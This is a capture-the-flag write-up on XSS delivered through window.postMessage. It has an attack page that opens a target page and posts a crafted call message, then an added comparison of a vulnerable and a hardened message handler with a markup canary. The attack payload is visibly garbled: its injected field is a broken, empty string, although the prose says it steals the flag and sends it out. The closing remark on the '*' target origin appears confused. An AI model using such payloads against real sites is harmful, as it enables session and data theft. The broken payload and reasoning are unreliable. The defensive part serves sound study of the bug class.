Tags: web xss 

Rating:

This challenge was solved by triggering XSS through the window.postMessage API. The payload below opens the vulnerable page and posts a crafted call message to it; the injected content reads the page containing the flag and sends it to my server.

```html
<html>
<body>
<script>
  // Open the target page so we hold a reference to its window object
  var call_window;
  call_window = window.open("http://localhost/call.php");
  console.log(call_window);

  // Give the page time to load and register its message listener,
  // then deliver the crafted call message to it
  setTimeout(function(){
    call_window.postMessage({
      type: "audio",
      details: {
        sender_username: "testuser2",
        sender_team_name: "test",
        receiver_username:"


aa",
        receiver_team_name: 'aa'
      }
    }, "*");
  }, 1000);
</script>
</body>
</html>
```
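The root cause of this class of bug is a message handler that trusts `event.data` and writes it into the DOM. The example below is added here and is not the challenge's own code: it models a call-notification handler of the shape the payload targets in a vulnerable and a hardened form. Both are written as plain functions that return the HTML they would insert, so the logic can be exercised outside a browser. The names `renderCallUnsafe`, `renderCallSafe` and `TRUSTED_ORIGIN`, and the sample message, are assumptions.

```javascript
// Added example, not code from the original writeup. Names are assumptions.
const TRUSTED_ORIGIN = "http://localhost"; // assumed origin of the calling page

// Escape the characters that matter in HTML text and attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;"
  })[c]);
}

// Vulnerable: no origin check, and untrusted fields are concatenated into
// markup that the real handler would assign to innerHTML.
function renderCallUnsafe(event) {
  const d = event.data.details;
  return `<div class="call">Incoming ${event.data.type} call from ` +
         `${d.sender_username} (${d.sender_team_name}) to ` +
         `${d.receiver_username} (${d.receiver_team_name})</div>`;
}

// Hardened: reject messages from other origins, validate the message shape,
// and escape every field before it becomes markup.
function renderCallSafe(event) {
  if (event.origin !== TRUSTED_ORIGIN) return null;
  const msg = event.data;
  if (!msg || typeof msg !== "object") return null;
  if (!["audio", "video"].includes(msg.type)) return null;
  const d = msg.details || {};
  const fields = ["sender_username", "sender_team_name",
                  "receiver_username", "receiver_team_name"];
  if (!fields.every(f => typeof d[f] === "string" && d[f].length <= 64)) return null;
  return `<div class="call">Incoming ${escapeHtml(msg.type)} call from ` +
         `${escapeHtml(d.sender_username)} (${escapeHtml(d.sender_team_name)}) to ` +
         `${escapeHtml(d.receiver_username)} (${escapeHtml(d.receiver_team_name)})</div>`;
}

// Constructed sample message with the same shape as the writeup's payload,
// using a harmless markup canary in receiver_username.
const sampleEvent = {
  origin: "http://attacker.example", // constructed: a foreign origin
  data: {
    type: "audio",
    details: {
      sender_username: "testuser2",
      sender_team_name: "test",
      receiver_username: '<img src=x onerror="alert(1)">',
      receiver_team_name: "aa"
    }
  }
};

// Same message as if it had come from the trusted origin.
const sampleTrustedEvent = { origin: TRUSTED_ORIGIN, data: sampleEvent.data };

console.log("unsafe:", renderCallUnsafe(sampleEvent));          // markup survives intact
console.log("safe (foreign origin):", renderCallSafe(sampleEvent)); // null
console.log("safe (trusted origin):", renderCallSafe(sampleTrustedEvent)); // escaped
```

The origin check alone is not enough here: the challenge page would have accepted the message from any origin because the payload uses a `"*"` target, but a page that checks `event.origin` and still writes the fields with `innerHTML` is only safe until the trusted origin itself carries attacker-controlled data. Both checks belong in the handler.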